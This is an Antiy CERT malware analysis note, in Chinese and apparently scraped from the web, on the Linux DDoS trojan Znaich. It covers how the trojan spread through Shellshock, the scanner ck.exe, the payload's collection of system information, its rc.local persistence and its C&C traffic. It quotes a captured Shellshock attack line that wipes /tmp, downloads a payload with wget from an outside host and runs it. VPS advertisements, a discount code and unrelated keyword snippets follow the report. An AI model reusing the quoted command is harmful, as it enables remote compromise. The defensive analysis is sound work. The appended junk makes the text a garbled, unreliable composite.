Znaich分析笔记安天安全研究与应急处理中心(AntiyCERT)Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第2页目录编者按.
11概述.
12感染源.
13样本分析.
34总结.
7附录一:参考资料.
7附录二:关于安天.
7Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第1页编者按安天CERT这篇分析笔记完成于2015年1月18日,但撰写后并未公开,为让安全工作者更进一步了解IoT僵尸网络的威胁,安天CERT决定公开本报告,作为《IOT僵尸网络严重威胁网络基础设施安全》一文的参考资料.
1概述安天CERT关注到近期针对Linux平台的木马十分活跃.
2015年1月13日,MalwareMustDie的日本工作人员HendrikAdrian在推特上发出其分析样本的截图,在1月14日MalwareMustDie官网博客发出分析报告.
有趣的是,同是在1月14日,HendrikAdrian发推表示XOR.
DDoS又回来了,该家族早在2014年9月就已经出现,但也有安全媒体发表文章却称该恶意代码是"新型木马",Avast的报告中也说明了XOR.
DDoS自2014年9月末就已经出现,因此可以得出"新型木马的结论"声音并没有对此事件进行深入研究.
从各方报告来看,1月13日出现的样本与1月14日出现的XOR.
DDoS样本没有关联,下面对1月13日出现的样本进行分析.
2感染源该恶意代码在2015年1月13日被发现,通过"破壳"漏洞进行攻击,根据MalwareMustDie的报告,以下是被检测到的攻击代码:[13/Jan/2015:06:07:18+0100]"GET/HTTP/1.
1"200311bin/bash-c\"rm-rf/tmp/*;echowgethttp://xxxx:81/9521-O/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echoechoByChina.
Z>>/tmp/Run.
sh;echochmod777/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echo/tmp/China.
Z-gxak\x80>>/tmp/Run.
sh;echorm-rf/tmp/Run.
sh>>/tmp/Run.
sh;chmod777/tmp/Run.
sh;/tmp/Run.
sh\""它利用"破壳"漏洞下载文件至/tmp文件夹中,通过sh脚本运行.
在2015年1月14日MalwareMustDie的报告中,该C&C服务器包含9521及ck.
exe两个文件:Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第2页而在1月16日下午13:19:49秒时,文件已经被替换:Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第3页从截图上看,有359人下载了名为9521的恶意代码.
而另一个名为ck.
exe的文件则是一个漏洞扫描器,恶意代码通过它进行传播.
3样本分析首先分析样本ck.
exe:原始文件名ck.
exeMD54E337BE817E4A667FA695E7980B8B851处理器架构X86-32文件大小1.
7MB(1816064bytes)文件格式BinExecute/Microsoft:EXE[:X86]时间戳2014-11-0804:09:02数字签名NO加壳类型无编译语言MicrosoftVisualC++VT首次上传时间2015-01-1308:05:48VT检测结果5/57病毒名称Trojan/Linux.
ShellShock判定结果恶意Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第4页1、运行后会弹出帮助可以看出,它有三个参数:HostFile、Threads、Address,HostFile为txt格式,内容为扫描的目标ip地址,Threads则是线程数量,Address就是恶意代码的地址.
2、对其反汇编,发现了MalwareMustDie报告中提到了攻击代码,可以看出,该样本扫描有"破壳"漏洞的机器,下载恶意代码并运行下面分析载荷文件9521:原始文件名9521MD5B7E3CA05806AA99CAD9D3768FF90F1D9处理器架构X86-32文件大小604.
4KB(618948bytes)文件格式BinExecute/ELF[:X86]数字签名NO加壳类型无VT首次上传时间2015-01-1306:04:59VT检测结果17/55病毒名称Trojan[DDOS]/Linux.
Znaich判定结果恶意1、样本运行后首先获取系统信息,包括系统版本(通过调用uname())系统时间(调用gettimeofday())Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第5页CPU核心数量及时钟频率(取自/proc/cpuinfo)CPU负载(取自/proc/stat)空闲内存大小及内存总量(取自/proc/meminfo)2、修改rc.
local(利用sed命令):删除末尾的exit0在第二行增加字符串"//ChinaZ"3、解密硬编码的C&C服务器地址Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第6页4、与C&C服务器通信,将之前获取的系统信息通过TCP数据包进行发送5、使用Keep-alive机制检测C&C服务器是否存活Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第7页4总结该样本通过"破壳"漏洞进行传播,为常见的DDOS攻击样本.
但扫描器时间戳为2014年11月,并且攻击者重新上传的样本文件也为2014年的DDOS攻击样本,说明该作者一直在利用"破壳"漏洞进行攻击.
附录一:参考资料[1]来源:MalwareMustDiehttp://blog.
malwaremustdie.
org/2015/01/mmd-0030-2015-new-elf-malware-on.
htmlhttp://pastebin.
com/raw.
phpi=gf4xrB9n[2]来源:KernerMode.
infohttp://www.
kernelmode.
info/forum/viewtopic.
phpf=16&t=3682&sid=7984f41ec2f98ab870c5a613a116d99e附录二:关于安天安天从反病毒引擎研发团队起步,目前已发展成为以安天实验室为总部,以企业安全公司、移动安全公司为两翼的集团化安全企业.
安天始终坚持以安全保障用户价值为企业信仰,崇尚自主研发创新,在安全检测引擎、移动安全、网络协议分析还原、动态分析、终端防护、虚拟化安全等方面形成了全能力链布局.
安天的监控预警能力覆盖全国、产品与服务辐射多个国家.
安天将大数据分析、安全可视化等方面的技术与产品体系有效结合,以海量样本自动化分析平台延展工程师团队作业能力、缩短产品响应周期.
结Trojan[DDOS]/Linux.
Znaich分析笔记安天实验室版权所有,欢迎无损转载第8页合多年积累的海量安全威胁知识库,综合应用大数据分析、安全可视化等方面经验,推出了应对高级持续性威胁(APT)和面向大规模网络与关键基础设施的态势感知与监控预警解决方案.
全球超过三十家以上的著名安全厂商、IT厂商选择安天作为检测能力合作伙伴,安天的反病毒引擎得以为全球近十万台网络设备和网络安全设备、近两亿部手机提供安全防护.
安天移动检测引擎是全球首个获得AV-TEST年度奖项的中国产品.
安天技术实力得到行业管理机构、客户和伙伴的认可,安天已连续四届蝉联国家级安全应急支撑单位资质,亦是中国国家信息安全漏洞库六家首批一级支撑单位之一.
安天是中国应急响应体系中重要的企业节点,在红色代码、口令蠕虫、震网、破壳、沙虫、方程式等重大安全事件中,安天提供了先发预警、深度分析或系统的解决方案.
关于反病毒引擎更多信息请访问:http://www.
antiy.
com(中文)http://www.
antiy.
net(英文)安天企业安全公司更多信息请访问:http://www.
antiy.
cn安天移动安全公司(AVLTEAM)更多信息请访问:http://www.
avlsec.
com
pacificrack又追加了3款特价便宜vps搞促销,而且是直接7折优惠(一次性),低至年付7.2美元。这是本月第3波便宜vps了。熟悉pacificrack的知道机房是QN的洛杉矶,接入1Gbps带宽,KVM虚拟,纯SSD RAID10,自带一个IPv4。官方网站:https://pacificrack.com支持PayPal、支付宝等方式付款7折秒杀优惠码:R3UWUYF01T内存CPUSS...
Virmach自上次推出了短租30天的VPS后,也就是月抛型vps,到期不能续费,直接终止服务。此次又推出为期6个月的月抛VPS,可选圣何塞和水牛城机房,适合短期有需求的用户,有兴趣的可以关注一下。VirMach是一家创办于2014年的美国商家,支持支付宝、PayPal等方式,是一家主营廉价便宜VPS服务器的品牌,隶属于Virtual Machine Solutions LLC旗下!在廉价便宜美国...
hypervmart怎么样?hypervmart是一家成立了很多年的英国主机商家,上一次分享他家还是在2年前,商家销售虚拟主机、独立服务器和VPS,VPS采用Hyper-V虚拟架构,这一点从他家的域名上也可以看出来。目前商家针对VPS有一个75折的优惠,而且VPS显示的地区为加拿大,但是商家提供的测速地址为荷兰和英国,他家的优势就是给到G口不限流量,硬盘为NVMe固态硬盘,这个配置用来跑跑数据非常...
pastebin.com为你推荐
急救知识纳入考试急救证容易拿到么?地图应用什么地图导航最好用最准确冯媛甑冯媛甄多大啊?百花百游“百花竟放贺阳春 万物从今尽转新 末数莫言穷运至 不知否极泰来临”是什么意思啊?杨丽晓博客杨丽晓哪一年出生的?partnersonline电脑内一切浏览器无法打开www.zhiboba.com登录哪个网站可以看nba当天的直播 是直播33tutu.com33gan.com改成什么了m.yushuwu.org花样滑冰名将YU NA KIM的资料谁有?盗车飞侠侠盗飞车罪恶都市警车任务怎么做
国外虚拟空间 鲁诺vps vultr美国与日本 可外链相册 免费高速空间 爱奇艺会员免费试用 lick iki 存储服务器 服务器机柜 服务器是什么意思 gotoassist godaddy域名 德国代理ip 文件传输 免费php空间申请 西安电信测速网 次世代主机 国内云主机 主机声音大 更多